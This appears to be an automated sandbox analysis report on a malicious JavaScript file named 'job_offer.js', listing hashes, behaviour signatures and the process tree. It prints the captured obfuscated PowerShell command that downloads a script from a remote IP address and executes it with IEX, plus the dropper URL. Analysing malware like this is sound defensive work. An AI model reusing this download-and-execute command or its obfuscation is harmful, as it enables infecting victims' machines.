Overview

overview

10

Static

static

1

job_offer.js

windows7-x64

10

job_offer.js

windows10-2004-x64

10

Analysis

  • max time kernel
    241s
  • max time network
    246s
  • platform
    windows7_x64
  • resource
    win7-20240704-en
  • resource tags

    arch:x64arch:x86image:win7-20240704-enlocale:en-usos:windows7-x64system
  • submitted
    18-07-2024 02:05

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    job_offer.js

  • Size

    7KB

  • MD5

    99d7d5e0a68fab595c03ba3e5cd12f4c

  • SHA1

    2c6100789c8906e9b308f80c9f4e3839c8aea41f

  • SHA256

    09be56cdd4003075a5a95a741f019105b23dbc140c5e8a034b0795c0a6ef87b9

  • SHA512

    788f5d86d96fc931ff5749dd0e62b874725c47a2ee3712ecf76a9b4867747a337e7dcd5e122d739785056c642d7521296f5c756691dddacc9c8ec4056b630b20

  • SSDEEP

    192:n5o3kqWRrmBE1KE5PqecWjEBiARGBRjdJU+udDqpkE+Rv:n5+zcr2YyTiiG3e02EEv

Score
10/10
execution

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
ps1.dropper

http://176.113.115.177/x/z.png

Signatures

  • Blocklisted process makes network request 1 IoCs
  • Command and Scripting Interpreter: JavaScript 1 TTPs
    execution
  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of WriteProcessMemory 3 IoCs

Processes

  • C:\Windows\system32\wscript.exe
    wscript.exe C:\Users\Admin\AppData\Local\Temp\job_offer.js
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:560
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $c1='(N%ew-Obje%c%t Ne%t.W%e';$c4='bCl%ie%nt).Do%%wn%l%o';$c3='adS%tri%%ng(''h%tt%p:%%//17%%%6.1%13%.11%%5.1%%%77%/%x/z%.p%n%%%g'')';$TC=($c1,$c4,$c3 -Join '');$TC=$TC.replace('%','');I`E`X $TC|I`E`X
      2⤵
      • Blocklisted process makes network request
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2468

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • memory/2468-4-0x000007FEF5A2E000-0x000007FEF5A2F000-memory.dmp

    Filesize

    4KB

    Download

  • memory/2468-5-0x000000001B220000-0x000000001B502000-memory.dmp

    Filesize

    2.9MB

    Download

  • memory/2468-6-0x0000000001FC0000-0x0000000001FC8000-memory.dmp

    Filesize

    32KB

    Download

  • memory/2468-7-0x000007FEF5770000-0x000007FEF610D000-memory.dmp

    Filesize

    9.6MB

    Download

  • memory/2468-8-0x000007FEF5770000-0x000007FEF610D000-memory.dmp

    Filesize

    9.6MB

    Download

  • memory/2468-9-0x000007FEF5770000-0x000007FEF610D000-memory.dmp

    Filesize

    9.6MB

    Download

  • memory/2468-10-0x000007FEF5770000-0x000007FEF610D000-memory.dmp

    Filesize

    9.6MB

    Download

  • memory/2468-11-0x000007FEF5770000-0x000007FEF610D000-memory.dmp

    Filesize

    9.6MB

    Download